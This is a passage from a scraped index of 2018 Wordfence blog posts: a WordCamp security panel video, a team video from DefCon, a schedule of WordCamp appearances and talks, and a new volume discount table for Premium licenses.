Aaron Campbell, the head of security for WordPress and an all-around great guy also makes an off-camera cameo. If you are interested in WordPress security and would like to get to know some of our best people a little better, I think you will really enjoy the conversation.

 

 

Video produced by nishasingh and originally published on WordPress.tv.

The post Video: WordCamp Atlanta Security Panel with Wordfence appeared first on Wordfence.

Read More

Meet the Defiant Team

In August, most of our team attended DefCon, a hacker conference in Las Vegas attended by tens of thousands of security professionals. All of us work remotely, so it is always really special to spend time together as a team.

This post is Copyright 2018 Defiant, Inc. and was published on the wordfence.com official blog. Republication of this post without permission is prohibited. You can find this post at: https://www.wordfence.com/blog/2018/09/meet-the-defiant-team/

While we were there we completed a fun project. We created a video with footage from many of our team events and interviews of team members talking about what it’s like to work at Defiant. We’re really happy with how it turned out, and thought you might enjoy getting to know the team behind Wordfence a little better and how we work together to keep your sites safe.


The post Meet the Defiant Team appeared first on Wordfence.

Read More

Wordfence: Live On Tour In A City Near You

This year we’ve attended and sponsored quite a few WordCamps, and have had members of our team speak at some as well. If you haven’t attended one recently we highly recommend it. They’re a great opportunity to learn and connect with other members of the WordPress community.

This post is Copyright 2018 Defiant, Inc. and was published on the wordfence.com official blog. Republication of this post without permission is prohibited. You can find this post at: https://www.wordfence.com/blog/2018/08/wordfence-live-on-tour-in-a-city-near-you/

WPCampus Highlights

While not strictly a WordCamp, in July we sponsored and attended WPCampus, “a community and conference for web professionals, educators and people dedicated to the confluence of WordPress in higher education.” We work with many educational institutions throughout the world to protect their WordPress sites, so sponsoring and attending the conference was a great opportunity to connect with our users face to face and introduce Wordfence to those who haven’t discovered us yet.

The Wordfence table was lively throughout the event, with Mikey giving impromptu lock picking lessons and Kathy going deep on how to protect WordPress at scale.

Mikey teaching lock picking to a WPCampus attendee

 

If you’re tasked with securing WordPress for a college or university and missed WPCampus, consider setting up some time with Kathy to discuss how best to leverage Wordfence to tackle the unique challenges you’re facing.

Those who attended the conference were treated to a presentation, “What the hack? Fortifying your security by understanding your adversary”, by our very own Mikey Veenstra. He is one of the Threat Analysts on our team who are responsible for developing the malware signatures and firewall rules that keep your sites safe. The WPCampus team was kind enough to capture the presentation and publish it on YouTube. We think you’ll enjoy it.

Upcoming WordCamps

WordCamp Minneapolis – this weekend

Through tomorrow (August 25th), we are attending and sponsoring WordCamp Minneapolis. Tim, Matt and James from our team are there manning the Wordfence table and running a capture the flag contest. We’re giving away great prizes including a Sony Playstation with a VR Bundle. Most of you probably know Tim from his years providing excellent support on our customer service team. Matt and James are both software developers on our team.

The Wordfence table at WordCamp Minneapolis

 

WordCamp Omaha  –  Sunday (8/26)

Our very own Brad Haas, Wordfence’s Senior Security Analyst, will be speaking tomorrow at WordCamp Omaha. His presentation, “Hacking War Stories (and what you can learn from them)”, is going to be really fun.

WordCamp New York – September 15 & 16th

Our Director of Information Security Colette Chamberland and Chloe Chamberland from our Security Services Team will be presenting “How to Optimally Secure Your WordPress Environment” on Saturday, September 15th at WordCamp New York.

WordCamp Sacramento – September 15th & 16th

We will be sponsoring and attending WordCamp Sacramento. Mark Maunder, our CEO, will be attending along with Kathy Zant, a Client Partner on our team. We will be running a capture the flag contest with great prizes. Kathy will be giving a talk titled “Evaluating Plugins: Strategies To Effectively Extend WordPress”, don’t miss it!

WordCamp Los Angeles – September 21st & 22nd

We will be sponsoring and attending WordCamp Los Angeles. A number of us will be attending and we will be running a capture the flag contest.

WordCamps Later in the Year

They’re still in planning stages, but we’re planning to attend quite a few WordCamps this fall. You will most likely see us in Vancouver, Orlando, Seattle, Portland and a few other cities. Stay tuned for more updates.

The post Wordfence: Live On Tour In A City Near You appeared first on Wordfence.

Read More

Announcing Revamped Volume Pricing for Premium Licenses

This year we have been very focused on the needs of agencies and other organizations with lots of sites to protect. We’ve spoken with many of you and have a clear picture of what we can do to make Wordfence work even better for you.

This post is Copyright 2018 Defiant, Inc. and was published on the wordfence.com official blog. Republication of this post without permission is prohibited. You can find this post at: https://www.wordfence.com/blog/2018/08/revamped-volume-pricing-premium-licenses/

To start things off, in June we released a feature that makes Premium licenses work seamlessly across development, test and staging domains. We’ve gotten tremendous feedback on it so far and encourage you to take advantage of it if you haven’t already.

The latest change we’ve made addresses what is probably the most common piece of feedback we receive from organizations that manage lots of sites. We’re changing the way we handle volume discounts. We have always offered volume discounts, but your discount was based solely on the number of licenses you purchased, and for how many years, during a single transaction. That worked well for us for a long time, but based on your feedback it was clear we needed to make a change.

Volume discounts for license purchases are now based on your total active license count, including what you’re buying today. For example, if you already have 5 licenses and want to purchase 2 more today, your discount is based on a total of 7. The table below shows our new volume discount rates:

Active License Count Discount % Price Per License
1 0% $99.00
2-4 10% $89.10
5-9 15% $84.15
10-14 20% $79.20
15+ 25% $74.25

 

If you are currently a Premium customer this means that any purchase you place going forward qualifies for a discount, regardless of how many licenses you purchase.

We are also offering incentives for purchasing additional years. Currently you will receive an additional 10% discount on your transaction if you purchase a 2 year license and 20% for 3.

Renewal prices for your new licenses are also based on your active license count. As you purchase more licenses, the discount applied to your renewal prices goes up.

Your old licenses won’t change… unless it’s in your favor

With this change we wanted to make sure that we didn’t raise prices for the licenses you already own. Your renewal price for licenses purchased before July 24th of this year will not change, unless your active license discount qualifies you for an even lower price. In that case we will automatically charge you the lower price. And as long as they’ve been installed on a website they count toward your active license count, improving your discount for new license purchases and lowering the renewal rate for your newer licenses.

More is on the way

Our team is currently hard at work on a major feature that will make managing and monitoring Wordfence across multiple sites much, much easier. We haven’t set a launch date yet, but you should see it within a few months. If you’d like early access I highly recommend signing up for our beta program.

Need help managing Wordfence at scale?

Our new Client Partner program was created with agencies and organizations with high profile sites to protect in mind. Set up a free 15 minute consultation today to learn how we can help you protect your sites with Wordfence.

 

 

 

The post Announcing Revamped Volume Pricing for Premium Licenses appeared first on Wordfence.

Read More
Page 1 of 612345»...Last »